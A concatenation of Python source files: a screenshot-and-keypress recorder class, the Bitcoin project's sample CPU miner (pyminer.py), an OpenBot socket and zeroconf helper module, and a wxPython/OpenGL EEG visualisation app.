map_box):
self.real_exit = real_exit
self.save_dir = save_dir
self.region = region
self.image_box = image_box
self.map_box = map_box
self.tape = []
self.lock = threading.Lock()
self.exiting = False
self.image_index = 0
self.image_dir = "{}images/".format(save_dir)
self.map_dir = "{}maps/".format(save_dir)
if not os.path.exists(self.image_dir):
os.makedirs(self.image_dir)
if not os.path.exists(self.map_dir):
os.makedirs(self.map_dir)
csv_file_name = "{}record_{}.csv".format(save_dir, int(time.time()))
while os.path.exists(csv_file_name):
csv_file_name = "{}record_{}.csv".format(save_dir, int(time.time()))
self.csv_file = open(csv_file_name, "w")
self.writer = csv.writer(self.csv_file)
threading.Thread(target=self.run).start()
def write(self, img, key):
self.tape.append((img, key))
def exit(self):
self.exiting = True
def run(self):
while True:
if len(self.tape) == 0:
if self.exiting:
self.real_exit(self.csv_file)
break
time.sleep(1)
else:
if not self.exiting:
time.sleep(1)
img, key = self.tape.pop(0)
if not os.path.exists("{}/preview.jpg".format(self.save_dir)):
img.save("{}/preview.jpg".format(self.save_dir))
image, map = self.__split_and_save(img)
name = "{}_{}".format(int(time.time()), self.image_index)
self.image_index += 1
image_name = "{}{}.jpg".format(self.image_dir, name)
map_name = "{}{}.jpg".format(self.map_dir, name)
image.save(image_name)
map.save(map_name)
self.writer.writerow([name, key])
def __split_and_save(self, img):
image = img.crop(self.image_box)
map = img.crop(self.map_box)
return image, map
|
pyminer.py | #!/usr/bin/python
#
# Copyright (c) 2011 The Bitcoin developers
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
import time
import json
import pprint
import hashlib
import struct
import re
import base64
import httplib
import sys
from multiprocessing import Process
ERR_SLEEP = 15
MAX_NONCE = 1000000L
settings = {}
pp = pprint.PrettyPrinter(indent=4)
class BitcoinRPC:
OBJID = 1
def __init__(self, host, port, username, password):
authpair = "%s:%s" % (username, password)
self.authhdr = "Basic %s" % (base64.b64encode(authpair))
self.conn = httplib.HTTPConnection(host, port, False, 30)
def rpc(self, method, params=None):
self.OBJID += 1
obj = { 'version' : '1.1',
'method' : method,
'id' : self.OBJID }
if params is None:
obj['params'] = []
else:
obj['params'] = params
self.conn.request('POST', '/', json.dumps(obj),
{ 'Authorization' : self.authhdr,
'Content-type' : 'application/json' })
resp = self.conn.getresponse()
if resp is None:
print "JSON-RPC: no response"
return None
body = resp.read()
resp_obj = json.loads(body)
if resp_obj is None:
print "JSON-RPC: cannot JSON-decode body"
return None
if 'error' in resp_obj and resp_obj['error'] != None:
return resp_obj['error']
if 'result' not in resp_obj:
print "JSON-RPC: no result in object"
return None
return resp_obj['result']
def getblockcount(self):
return self.rpc('getblockcount')
def getwork(self, data=None):
return self.rpc('getwork', data)
def uint32(x):
return x & 0xffffffffL
def bytereverse(x):
return uint32(( ((x) << 24) | (((x) << 8) & 0x00ff0000) |
(((x) >> 8) & 0x0000ff00) | ((x) >> 24) ))
def bufreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
word = struct.unpack('@I', in_buf[i:i+4])[0]
out_words.append(struct.pack('@I', bytereverse(word)))
return ''.join(out_words)
def wordreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
out_words.append(in_buf[i:i+4])
out_words.reverse()
return ''.join(out_words)
class Miner:
def __init__(self, id):
self.id = id
self.max_nonce = MAX_NONCE
def work(self, datastr, targetstr):
# decode work data hex string to binary
static_data = datastr.decode('hex')
static_data = bufreverse(static_data)
# the first 76b of 80b do not change
blk_hdr = static_data[:76]
# decode 256-bit target value
targetbin = targetstr.decode('hex')
targetbin = targetbin[::-1] # byte-swap and dword-swap
targetbin_str = targetbin.encode('hex')
target = long(targetbin_str, 16)
# pre-hash first 76b of block header
static_hash = hashlib.sha256()
static_hash.update(blk_hdr)
for nonce in xrange(self.max_nonce):
# encode 32-bit nonce value
nonce_bin = struct.pack("<I", nonce)
# hash final 4b, the nonce value
hash1_o = static_hash.copy()
hash1_o.update(nonce_bin)
hash1 = hash1_o.digest()
# sha256 hash of sha256 hash
hash_o = hashlib.sha256()
hash_o.update(hash1)
hash = hash_o.digest()
# quick test for winning solution: high 32 bits zero?
if hash[-4:] != '\0\0\0\0':
continue
# convert binary hash to 256-bit Python long
hash = bufreverse(hash)
hash = wordreverse(hash)
hash_str = hash.encode('hex')
l = long(hash_str, 16)
# proof-of-work test: hash < target
if l < target:
print time.asctime(), "PROOF-OF-WORK found: %064x" % (l,)
return (nonce + 1, nonce_bin)
else:
print time.asctime(), "PROOF-OF-WORK false positive %064x" % (l,)
# return (nonce + 1, nonce_bin)
return (nonce + 1, None)
def submit_work(self, rpc, original_data, nonce_bin):
nonce_bin = bufreverse(nonce_bin)
nonce = nonce_bin.encode('hex')
solution = original_data[:152] + nonce + original_data[160:256]
param_arr = [ solution ]
result = rpc.getwork(param_arr)
print time.asctime(), "--> Upstream RPC result:", result
def iterate(self, rpc):
work = rpc.getwork()
if work is None:
time.sleep(ERR_SLEEP)
return
if 'data' not in work or 'target' not in work:
time.sleep(ERR_SLEEP)
return
time_start = time.time()
(hashes_done, nonce_bin) = self.work(work['data'],
work['target'])
time_end = time.time()
time_diff = time_end - time_start
self.max_nonce = long(
(hashes_done * settings['scantime']) / time_diff)
if self.max_nonce > 0xfffffffaL:
self.max_nonce = 0xfffffffaL
if settings['hashmeter']:
print "HashMeter(%d): %d hashes, %.2f Khash/sec" % (
self.id, hashes_done,
(hashes_done / 1000.0) / time_diff)
if nonce_bin is not None:
self.submit_work(rpc, work['data'], nonce_bin)
def loop(self):
rpc = BitcoinRPC(settings['host'], settings['port'],
settings['rpcuser'], settings['rpcpass'])
if rpc is None:
return
while True:
self.iterate(rpc)
def miner_thread(id):
miner = Miner(id)
miner.loop()
if __name__ == '__main__':
if len(sys.argv) != 2:
print "Usage: pyminer.py CONFIG-FILE"
sys.exit(1)
f = open(sys.argv[1])
for line in f:
# skip comment lines
m = re.search('^\s*#', line)
if m:
continue
# parse key=value lines
m = re.search('^(\w+)\s*=\s*(\S.*)$', line)
if m is None:
continue
settings[m.group(1)] = m.group(2)
f.close()
if 'host' not in settings:
settings['host'] = '127.0.0.1'
if 'port' not in settings:
settings['port'] = 16117
if 'threads' not in settings:
settings['threads'] = 1
if 'hashmeter' not in settings:
settings['hashmeter'] = 0
if 'scantime' not in settings:
settings['scantime'] = 30L
if 'rpcuser' not in settings or 'rpcpass' not in settings:
print "Missing username and/or password in cfg file"
sys.exit(1)
settings['port'] = int(settings['port'])
settings['threads'] = int(settings['threads'])
settings['hashmeter'] = int(settings['hashmeter'])
settings['scantime'] = long(settings['scantime'])
thr_list = []
for thr_id in range(settings['threads']):
p = Process(target=miner_thread, args=(thr_id,))
p.start()
thr_list.append(p)
time.sleep(1) # stagger threads
print settings['threads'], "mining threads started"
print time.asctime(), "Miner Starts - %s:%s" % (settings['host'], settings['port'])
try:
for thr_proc in thr_list:
thr_proc.join()
except KeyboardInterrupt:
pass
print time.asctime(), "Miner Stops - %s:%s" % (settings['host'], settings['port'])
|
common.py | import socket
import zeroconf # DO: pip3 install zeroconf
import threading
import sched, time
def get_ip():
with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
s.connect(("1.2.3.4", 1)) # dummy connect
return s.getsockname()[0]
class ServerSocket:
MSGLEN = 512
def __init__(self, sock=None):
if sock is None:
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.sock.bind(("0.0.0.0", 19400))
self.sock.listen()
else:
self.sock = sock
def accept(self):
(conn, addr) = self.sock.accept()
self.server_socket = conn
def send(self, msg):
sent = self.server_socket.send(msg.encode("utf-8"))
def receive(self):
chunks = []
while True:
# OK, I know, we are not going for efficiency here...
chunk = self.server_socket.recv(1)
chunks.append(chunk)
if chunk == b"\n" or chunk == b"":
break
return b"".join(chunks).decode("utf-8")
def close(self):
try:
self.sock.close()
self.server_socket.close()
except:
print("Could not close all sockets")
class DriveValue:
"""
This represents a drive value for either left or right control. Valid values are between -1.0 and 1.0
"""
MAX = 1.0
MIN = -1.0
DELTA = 0.05
value = 0.0
def reset(self):
self.value = 0.0
return self.value
def incr(self, by_value=0):
self.value = min(
self.MAX, self.value + (by_value if by_value != 0 else self.DELTA)
)
return round(self.value, 3)
def decr(self, by_value=0):
self.value = max(
self.MIN, self.value - (by_value if by_value != 0 else self.DELTA)
)
return round(self.value, 3)
def max(self):
self.value = self.MAX
return self.value
def min(self):
self.value = self.MIN
return self.value
def write(self, value):
self.value = value
return self.value
def read(self):
return round(self.value, 3)
class ZeroReverter:
def __init__(self, left, right, duration, steps, s_socket):
"""
We like to revert left and right DriveValues to zero in `duration` milliseconds in `steps` steps.
"""
if duration < steps:
raise Exception("Duration too small")
self.left = left
self.right = right
self.duration = duration
self.steps = steps
self.interval = duration / steps
self.event = None
self.scheduler = sched.scheduler(time.time, time.sleep)
self.s_socket = s_socket
def reset(self):
if self.event is not None and not self.scheduler.empty():
self.scheduler.cancel(self.event)
self.delta_left = self.left.getValue() / self.steps
self.delta_right = self.right.getValue() / self.steps
self.event = self.scheduler.enter(self.interval, 1, self.send_command)
t = threading.Thread(target=self.scheduler.run)
t.start()
def send_command(self):
ROUND_ERROR = 0.001
self.left.decr(self.delta_left)
self.right.decr(self.delta_right)
if abs(self.left.getValue()) < ROUND_ERROR:
self.left.reset()
self.right.reset()
else:
self.event = self.scheduler.enter(self.interval, 1, self.send_command)
try:
self.s_socket.send(
"{{driveCmd: {{l:{l}, r:{r} }} }}\n".format(
l=self.left.getValue(), r=self.right.getValue()
)
)
except Exception as e:
print(f"Stopping scheduler...got exception {e}\r")
if self.event is not None and not self.scheduler.empty():
self.scheduler.cancel(self.event)
finally:
if not self.scheduler.empty():
self.scheduler.cancel(self.event)
def register(name, port, properties={}):
type_ = "_openbot._tcp.local."
ipAddr = socket.inet_pton(socket.AF_INET, get_ip())
info = zeroconf.ServiceInfo(
type_="_openbot._tcp.local.",
name=name + "." + type_,
addresses=[ipAddr],
port=port,
weight=0,
priority=0,
properties=properties,
)
zc = zeroconf.Zeroconf([get_ip()])
zc.register_service(info)
return (zc, info)
|
Triathlon-Analyzer.py | #!/usr/bin/python
# Howto, Code license, Credits, etc: http://code.google.com/B/BCI-Project-Triathlon/
noGL = False # Set noGL to True for disabling the use of OpenGL (to gain speed, or to avoid python-wx-opengl problems)
import numpy
import wx
import math
import threading
import random
import sys
import os
import random
import InputManager
import WXElements
try:
from wx import glcanvas
haveGLCanvas = True
except ImportError:
haveGLCanvas = False
noGL = True
print "Will start without OpenGL, because wx.glcanvas is not available."
try:
from OpenGL.GL import *
from OpenGL.GLU import *
from OpenGL.GLUT import *
haveOpenGL = True
except ImportError:
haveOpenGL = False
noGL = True
print "Will start without OpenGL, because PyOpenGL is not available."
class AppSettings():
def __init__(self,
niaFPS = 10,
deviceName = "OCZ Neural Impulse Actuator",
bands = [(2,4),(5,7),(8,10),(11,13),(14,16),(17,20),(21,24),(25,30),(31,45)]):
self.niaFPS = niaFPS
self.deviceName = deviceName
self.bands = bands
class RawVisualizationPanel(WXElements.GLCanvasBase):
def InitGL(self):
light_diffuse = [1.0, 1.0, 1.0, 1.0]
light_position = [1.0, 1.0, 1.0, 0.0]
glLightfv(GL_LIGHT0, GL_DIFFUSE, light_diffuse)
glLightfv(GL_LIGHT0, GL_POSITION, light_position)
glEnable(GL_LIGHTING)
glEnable(GL_LIGHT0)
glEnable(GL_DEPTH_TEST)
glClearColor(0.0, 0.0, 0.0, 1.0)
glClearDepth(1.0)
glMatrixMode(GL_PROJECTION)
glLoadIdentity()
gluPerspective(40.0, 1.0, 1.0, 30.0)
glMatrixMode(GL_MODELVIEW)
glLoadIdentity()
gluLookAt(0.0, 0.0, 10.0,
0.0, 0.0, 0.0,
0.0, 1.0, 0.0)
def OnDraw(self):
glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)
glLoadIdentity()
glEnableClientState(GL_VERTEX_ARRAY)
for eachI in range(len(bciDevice.devices)):
glColor(0.55,0.55,0.3)
wave_array = []
for historyIndex in reversed(xrange(500)):
wave_array = wave_array +[[-1.0+ (2.0*float(historyIndex)/499.0), -1.0+((2.0*eachI)+(0.0000001*bciDevice.working_Data(eachI)[-1-historyIndex]))/len(bciDevice.devices)]]
glVertexPointerf(wave_array)
glDrawArrays(GL_LINE_STRIP, 0, len(wave_array))
for eachI in range(len(bciDevice.devices)):
glColor(0.55,0.55,0.3)
glRasterPos2f(0.2 ,-0.5 +( (2.0*eachI))/len(bciDevice.devices))
for eachChar in ("Device "+str(eachI)+" Raw"):
glutBitmapCharacter(GLUT_BITMAP_HELVETICA_12, ord(eachChar))
self.SwapBuffers()
def newReading(self):
if self.GetGrandParent().GetSelection()==0:
self.SetCurrent()
self.OnDraw()
def resetReading(self):
if self.GetGrandParent().GetSelection()==0:
self.SetCurrent()
self.OnDraw()
class FFTVisualizationPanel(WXElements.GLCanvasBase):
def InitGL(self):
light_diffuse = [1.0, 1.0, 1.0, 1.0]
light_position = [1.0, 1.0, 1.0, 0.0]
glLightfv(GL_LIGHT0, GL_DIFFUSE, light_diffuse)
glLightfv(GL_LIGHT0, GL_POSITION, light_position)
glEnable(GL_LIGHTING)
glEnable(GL_LIGHT0)
glEnable(GL_DEPTH_TEST)
glClearColor(0.0, 0.0, 0.0, 1.0)
glClearDepth(1.0)
glMatrixMode(GL_PROJECTION)
glLoadIdentity()
gluPerspective(40.0, 1.0, 1.0, 30.0)
glMatrixMode(GL_MODELVIEW)
glLoadIdentity()
gluLookAt(0.0, 0.0, 10.0,
0.0, 0.0, 0.0,
0.0, 1.0, 0.0)
def OnDraw(self):
glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)
glLoadIdentity()
glEnableClientState(GL_VERTEX_ARRAY)
for eachI in range(len(bciDevice.devices)):
for eachFingerI in range(len(settings.bands)):
everyFingerI = (eachI*len(settings.bands)) + eachFingerI
glColor(everyFingerI*0.05+0.3,-everyFingerI*0.05+0.9,float(everyFingerI%2))
seg = bciDevice.frequencies(eachI,settings.bands[eachFingerI][0],settings.bands[eachFingerI][1])
avg = sum(seg)/len(seg)
wave_array = [[ -1.0+ (2.0*float(settings.bands[eachFingerI][0])/49.0) , -1.0+((2.0*eachI))/len(bciDevice.devices) ],
[ -1.0+ (2.0*float(settings.bands[eachFingerI][0])/49.0) , -1.0+((2.0*eachI) + avg)/len(bciDevice.devices)],
[ -1.0+ (2.0*float(settings.bands[eachFingerI][1])/49.0), -1.0+((2.0*eachI))/len(bciDevice.devices)],
[ -1.0+ (2.0*float(settings.bands[eachFingerI][1])/49.0), -1.0+((2.0*eachI) + avg)/len(bciDevice.devices)]]
glVertexPointerf(wave_array)
glDrawArrays(GL_QUAD_STRIP, 0, len(wave_array))
for eachI in range(len(bciDevice.devices)):
glColor(1.0,0.55,0.3)
wave_array = []
for freqs in reversed(xrange(50)):
wave_array = wave_array +[[-1.0+ (2.0*float(freqs)/49.0), -1.0+((2.0*eachI)+(bciDevice.frequencies(eachI,0,50)[freqs]))/len(bciDevice.devices)]]
glVertexPointerf(wave_array)
glDrawArrays(GL_LINE_STRIP, 0, len(wave_array))
for eachI in range(len(bciDevice.devices)):
glColor(1.0,0.55,0.3)
glRasterPos2f(0.2 ,-0.55 +( (2.0*eachI))/len(bciDevice.devices))
for eachChar in ("Device "+str(eachI)+" FFT"):
glutBitmapCharacter(GLUT_BITMAP_HELVETICA_12, ord(eachChar))
glColor(0.55,0.55,0.55)
glRasterPos2f(0.2 ,-0.60 +( (2.0*eachI))/len(bciDevice.devices))
for eachChar in ("Device "+str(eachI)+" EEG Bands"):
glutBitmapCharacter(GLUT_BITMAP_HELVETICA_12, ord(eachChar))
self.SwapBuffers()
def newReading(self):
if self.GetGrandParent().GetSelection()==2:
self.SetCurrent()
self.OnDraw()
def resetReading(self):
if self.GetGrandParent().GetSelection()==2:
self.SetCurrent()
self.OnDraw()
class FFTHistoryVisualizationPanel(WXElements.GLCanvasBase):
def __init__(self, parent):
self.ylists = [[ 0.0 for each in xrange(len(settings.bands)*len(bciDevice.devices))] for every in range(100)]
self.xlist = [float(i)/float(-1+len(self.ylists[0])) for i in xrange(len(self.ylists[0]))]
WXElements.GLCanvasBase.__init__(self, parent)
def InitGL(self):
light_diffuse = [1.0, 1.0, 1.0, 1.0]
light_position = [1.0, 1.0, 1.0, 0.0]
glLightfv(GL_LIGHT0, GL_DIFFUSE, light_diffuse)
glLightfv(GL_LIGHT0, GL_POSITION, light_position)
glEnable(GL_LIGHTING)
glEnable(GL_LIGHT0)
glEnable(GL_DEPTH_TEST)
glClearColor(0.0, 0.0, 0.0, 1.0)
glClearDepth(1.0)
glMatrixMode(GL_PROJECTION)
glLoadIdentity()
gluPerspective(40.0, 1.0, 1.0, 30.0)
glMatrixMode(GL_MODELVIEW)
glLoadIdentity()
gluLookAt(0.0, 0.0, 10.0,
0.0, 0.0, 0.0,
0.0, 1.0, 0.0)
def OnDraw(self):
glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)
glLoadIdentity()
glEnableClientState(GL_VERTEX_ARRAY)
for everyFingerI in range(len(settings.bands)*len(bciDevice.devices)):
glColor(everyFingerI*0.05+0.3,-everyFingerI*0.05+0.9,float(everyFingerI%2))
wave_array = []
for historyIndex in xrange(100):
wave_array.append([-1.0+ (2.0*float(historyIndex)/99.0), -0.9 + (0.1*everyFingerI) + (0.3 * self.ylists[historyIndex][everyFingerI])])
glVertexPointerf(wave_array)
glDrawArrays(GL_LINE_STRIP, 0, len(wave_array))
glRasterPos2f(-0.95 ,-0.95 + (0.1*everyFingerI) )
for eachChar in ("Device "+str(everyFingerI/len(settings.bands))+", Band "+str(everyFingerI%len(settings.bands))+": "+
str(settings.bands[everyFingerI%len(settings.bands)][0])+
"-"+
str(settings.bands[everyFingerI%len(settings.bands)][1])+" Hz"):
glutBitmapCharacter(GLUT_BITMAP_HELVETICA_12, ord(eachChar))
self.SwapBuffers()
def newReading(self):
newReadings = []
for eachDeviceI in range(len(bciDevice.devices)):
for eachFingerIndex in range(len(settings.bands)):
fingerlist = bciDevice.frequencies(eachDeviceI,settings.bands[eachFingerIndex][0],settings.bands[eachFingerIndex][1])
newReadings.append(float(sum(fingerlist))/float(len(fingerlist)))
self.ylists = [newReadings]+self.ylists[0:99]
if self.GetGrandParent().GetSelection()==3:
self.SetCurrent()
self.OnDraw()
def resetReading(self):
self.ylists = [[0.0 for each in xrange(len(settings.bands)*len(bciDevice.devices))] for every in range(100)]
if self.GetGrandParent().GetSelection()==3:
self.SetCurrent()
self.OnDraw()
class SpectogramVisualizationPanel(WXElements.GLCanvasBase):
def __init__(self, parent):
WXElements.GLCanvasBase.__init__(self, parent)
self.historyLength = 5
self.colorlists = [[ self.spectralColor(0.0) for each in xrange(50*len(bciDevice.devices))] for every in xrange(self.historyLength)]
xlist = [-1.0+(2.0*float(i)/float(-1+self.historyLength)) for i in xrange(self.historyLength)]
ylist = [-1.0+(2.0*float(i)/float(-1+len(self.colorlists[0]))) for i in xrange(len(self.colorlists[0]))]
columns = []
self.quadCols = []
for historyIndex in xrange(self.historyLength):
x = xlist[historyIndex]
columns.append([[x,y] for y in ylist])
for historyIndex in xrange(self.historyLength-1):
self.quadCols.append(zip ( columns[historyIndex] , columns[historyIndex+1]))
self.spectralColorColumHistory = []
for historyIndex in xrange(self.historyLength-1):
self.spectralColorColumHistory.append(zip ( self.colorlists[historyIndex] , self.colorlists[historyIndex+1]))
def InitGL(self):
light_diffuse = [1.0, 1.0, 1.0, 1.0]
light_position = [1.0, 1.0, 1.0, 0.0]
glLightfv(GL_LIGHT0, GL_DIFFUSE, light_diffuse)
glLightfv(GL_LIGHT0, GL_POSITION, light_position)
glEnable(GL_LIGHTING)
glEnable(GL_LIGHT0)
glEnable(GL_DEPTH_TEST)
glClearColor(0.0, 0.0, 0.0, 1.0)
glClearDepth(1.0)
glMatrixMode(GL_PROJECTION)
glLoadIdentity()
gluPerspective(40.0, 1.0, 1.0, 30.0)
glMatrixMode(GL_MODELVIEW)
glLoadIdentity()
gluLookAt(0.0, 0.0, 10.0,
0.0, 0.0, 0.0,
0.0, 1.0, 0.0)
def OnDraw(self):
glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)
glLoadIdentity()
glEnableClientState(GL_VERTEX_ARRAY)
glEnableClientState(GL_COLOR_ARRAY)
for historyIndex in xrange(self.historyLength-1):
glVertexPointerf(self.quadCols[historyIndex])
glColorPointerf(self.spectralColorColumHistory[historyIndex])
glDrawArrays(GL_QUAD_STRIP, 0, 2*50*len(bciDevice.devices))
self.SwapBuffers()
def newReading(self):
newReadings = []
for eachDeviceI in range(len(bciDevice.devices)):
newReadings.extend(bciDevice.frequencies(eachDeviceI,0,50))
self.colorlists = [map(self.spectralColor,newReadings)]+self.colorlists[0:(self.historyLength-1)]
self.spectralColorColumHistory = [ zip ( self.colorlists[0] , self.colorlists[1])
]+self.spectralColorColumHistory[0:(self.historyLength-2)]
if self.GetGrandParent().GetSelection()==1:
self.SetCurrent()
self.OnDraw()
def resetReading(self):
self.colorlists = [[ self.spectralColor(0.0) for each in xrange(50*len(bciDevice.devices))] for every in xrange(self.historyLength)]
xlist = [-1.0+(2.0*float(i)/float(-1+self.historyLength)) for i in xrange(self.historyLength)]
ylist = [-1.0+(2.0*float(i)/float(-1+len(self.colorlists[0]))) for i in xrange(len(self.colorlists[0]))]
columns = []
self.quadCols = []
for historyIndex in xrange(self.historyLength):
x = xlist[historyIndex]
columns.append([[x,y] for y in ylist])
for historyIndex in xrange(self.historyLength-1):
self.quadCols.append(zip ( columns[historyIndex] , columns[historyIndex+1]))
self.spectralColorColumHistory = []
for historyIndex in xrange(self.historyLength-1):
self.spectralColorColumHistory.append(zip ( self.colorlists[historyIndex] , self.colorlists[historyIndex+1]))
if self.GetGrandParent().GetSelection()==1:
self.SetCurrent()
self.OnDraw()
def spectralColor(self,v):
if v <= 0.0:
return [0.0,0.0,0.0]
elif v <= 0.2:
return [0.0,0.0,v*5.0]
elif v <= 0.5:
return [(v-0.2)/0.3,0.0,1.0]
elif v <= 1.5:
return [1.0,0.0,1.0-(v-0.5)]
elif v <= 11.5:
return [1.0,((v-1.5)*0.05),0.0]
else:
return [1.0,1.0,((v-11.5)*0.008)]
class SettingsPanel(wx.Panel):
def __init__(self, parent):
wx.Panel.__init__(self, parent)
self.fpsField = wx.TextCtrl(self,value=str(settings.niaFPS))
self.fpsField.Bind(wx.EVT_KILL_FOCUS, self.fpsChanged)
panelSizer = wx.FlexGridSizer(0,10,0,0)
panelSizer.AddGrowableCol(0)
panelSizer.Add(wx.StaticText(self,label=""), 0, wx.ALIGN_CENTER, 5)
panelSizer.Add(wx.StaticText(self,label="Samples per second:"), 0, wx.ALIGN_CENTER, 5)
panelSizer.Add(self.fpsField, 0, wx.EXPAND, 5)
panelSizer.AddGrowableCol(3)
panelSizer.Add(wx.StaticText(self,label=""), 0, wx.ALIGN_CENTER, 5)
self.bandChoice = wx.Choice(self,choices=[("EEG Band "+str(i)) for i in xrange(9)])
panelSizer.Add(self.bandChoice, 0, wx.ALIGN_CENTER, 5)
self.bandChoice.Bind(wx.EVT_CHOICE, self.bandChanged)
self.fromFreqField = wx.TextCtrl(self,value=str(settings.bands[0][0]))
panelSizer.Add(self.fromFreqField, 0, wx.EXPAND, 5)
self.fromFreqField.Bind(wx.EVT_KILL_FOCUS, self.freqChanged)
panelSizer.Add(wx.StaticText(self,label="-"), 0, wx.ALIGN_CENTER, 5)
self.toFreqField = wx.TextCtrl(self,value=str(settings.bands[0][1]))
panelSizer.Add(self.toFreqField, 0, wx.EXPAND, 5)
self.toFreqField.Bind(wx.EVT_KILL_FOCUS, self.freqChanged)
panelSizer.Add(wx.StaticText(self,label="Hz"), 0, wx.ALIGN_CENTER, 5)
panelSizer.AddGrowableCol(9)
panelSizer.Add(wx.StaticText(self,label=""), 0, wx.ALIGN_CENTER, 5)
self.SetSizer(panelSizer)
self.SetAutoLayout(1)
def fpsChanged(self, event):
val = 0
try:
val = int(self.fpsField.GetValue())
except ValueError:
val = settings.niaFPS
if (val<1):
val = 1
elif (val>50):
val = 50
settings.niaFPS = val
self.fpsField.SetValue(str(val))
self.GetGrandParent().timer.Stop()
bciDevice.setPoints(int(500.0/settings.niaFPS))
self.GetGrandParent().timer.Start(int(1000.0/settings.niaFPS))
event.Skip()
def bandChanged(self, event):
i = self.bandChoice.GetSelection()
self.fromFreqField.SetValue(str(settings.bands[i][0]))
self.toFreqField.SetValue(str(settings.bands[i][1]))
event.Skip()
def freqChanged(self, event):
i = self.bandChoice.GetSelection()
fr = 0
try:
fr = int(self.fromFreqField.GetValue())
except ValueError:
fr = settings.bands[i][0]
if (fr<0):
fr = 0
elif (fr>100):
fr = 100
to = 0
try:
to = int(self.toFreqField.GetValue())
except ValueError:
to = settings.bands[i][1]
if (to<0):
to = 0
elif (to>100):
to = 100
if to<fr:
sw = fr
fr = to
to = sw
elif to == fr:
to = to+2
if abs(to-fr)==1:
to=to+1
self.fromFreqField.SetValue(str(fr))
self.toFreqField.SetValue(str(to))
settings.bands[i] = (fr,to)
event.Skip()
class GUIMain(wx.Frame):
def __init__(self):
wx.Frame.__init__(self,None,title="Triathlon Analyzer",size=(600,600))
self.panel = wx.Panel(self, wx.ID_ANY)
MenuBar = wx.MenuBar()
self.FileMenu = wx.Menu()
item = self.FileMenu.Append(wx.ID_ANY, text="Calibrate")
self.Bind(wx.EVT_MENU, self.OnCalibrate, item)
item = self.FileMenu.Append(wx.ID_EXIT, text="Quit")
self.Bind(wx.EVT_MENU, self.OnQuit, item)
MenuBar.Append(self.FileMenu, "Menu")
self.SetMenuBar(MenuBar)
sizer = wx.FlexGridSizer(2,1,0,0)
self.settingsPanel = SettingsPanel(self.panel)
self.tabs = wx.Notebook(self.panel)
rawvisualizationPanel = wx.Panel(self.tabs, wx.ID_ANY)
rawvisualizationSizer = wx.FlexGridSizer(1,1,0,0)
rawvisualizationSizer.AddGrowableRow(0)
rawvisualizationSizer.AddGrowableCol(0)
if noGL:
self.rawvisualizationCanvas = WXElements.NoGLVisualizationPanel(rawvisualizationPanel)
else:
self.rawvisualizationCanvas = RawVisualizationPanel(rawvisualizationPanel)
rawvisualizationSizer.Add(self.rawvisualizationCanvas , 1, wx.EXPAND)
rawvisualizationPanel.SetSizer(rawvisualizationSizer)
visualizationPanel = wx.Panel(self.tabs, wx.ID_ANY)
visualizationSizer = wx.FlexGridSizer(1,1,0,0)
visualizationSizer.AddGrowableRow(0)
visualizationSizer.AddGrowableCol(0)
if noGL:
self.visualizationCanvas = WXElements.NoGLVisualizationPanel(visualizationPanel)
else:
self.visualizationCanvas = FFTVisualizationPanel(visualizationPanel)
visualizationSizer.Add(self.visualizationCanvas , 1, wx.EXPAND)
visualizationPanel.SetSizer(visualizationSizer)
historyPanel = wx.Panel(self.tabs, wx.ID_ANY)
historySizer = wx.FlexGridSizer(1,1,0,0)
historySizer.AddGrowableRow(0)
historySizer.AddGrowableCol(0)
if noGL:
self.historyCanvas = WXElements.NoGLVisualizationPanel(historyPanel)
else:
self.historyCanvas = FFTHistoryVisualizationPanel(historyPanel)
historySizer.Add(self.historyCanvas , 1, wx.EXPAND)
historyPanel.SetSizer(historySizer)
spectogramPanel = wx.Panel(self.tabs, wx.ID_ANY)
spectogramSizer = wx.FlexGridSizer(1,1,0,0)
spectogramSizer.AddGrowableRow(0)
spectogramSizer.AddGrowableCol(0)
if noGL:
self.spectogramCanvas = WXElements.NoGLVisualizationPanel(spectogramPanel)
else:
self.spectogramCanvas = SpectogramVisualizationPanel(spectogramPanel)
spectogramSizer.Add(self.spectogramCanvas , 1, wx.EXPAND)
spectogramPanel.SetSizer(spectogramSizer)
self.tabs.AddPage(rawvisualizationPanel,"Raw")
self.tabs.AddPage(spectogramPanel,"Spectogram")
self.tabs.AddPage(visualizationPanel,"EEG Bands")
self.tabs.AddPage(historyPanel,"EEG Band History")
sizer.AddGrowableCol(0)
sizer.Add(wx.StaticText(self.panel,label=""), 0, wx.ALIGN_CENTER, 5)
sizer.Add(self.settingsPanel , 1, wx.EXPAND)
sizer.Add(wx.StaticText(self.panel,label=""), 0, wx.ALIGN_CENTER, 5)
sizer.AddGrowableRow(3)
sizer.Add(self.tabs , 1, wx.EXPAND)
self.panel.SetSizer(sizer)
self.panel.SetAutoLayout(1)
self.timer = wx.Timer(self, wx.ID_ANY)
self.Bind(wx.EVT_TIMER, self.NiaUpdate, self.timer)
def OnQuit(self, event):
self.timer.Stop()
self.Close()
def OnCalibrate(self, event):
bciDevice.calibrateAll()
event.Skip()
def NiaUpdate(self, ev):
if bciDevice.deviceType == InputManager.OCZ_NIAx2:
data_thread = threading.Thread(target=bciDevice.record,args=([0]))
data_thread2 = threading.Thread(target=bciDevice.record,args=([1]))
data_thread.start()
data_thread2.start()
bciDevice.process(0)
bciDevice.process(1)
else:
data_thread = threading.Thread(target=bciDevice.record,args=([0]))
data_thread.start()
bciDevice.process(0)
self.rawvisualizationCanvas.newReading()
self.spectogramCanvas.newReading()
self.visualizationCanvas.newReading()
self.historyCanvas.newReading()
ev.Skip()
class NiaEEGApp(wx.App):
def __init__(self, redirect = False):
wx.App.__init__(self)
self.mainWindow = GUIMain()
self.mainWindow.Show(True)
bciDevice.setPoints(int(500.0/settings.niaFPS))
self.mainWindow.timer.Start(int(1000.0/settings.niaFPS))
if __name__ == "__main__":
settings = AppSettings()
selection = WXElements.selection("Select your Device",InputManager.SupportedDevices.keys()[0],InputManager.SupportedDevices.keys())
settings.deviceName = selection
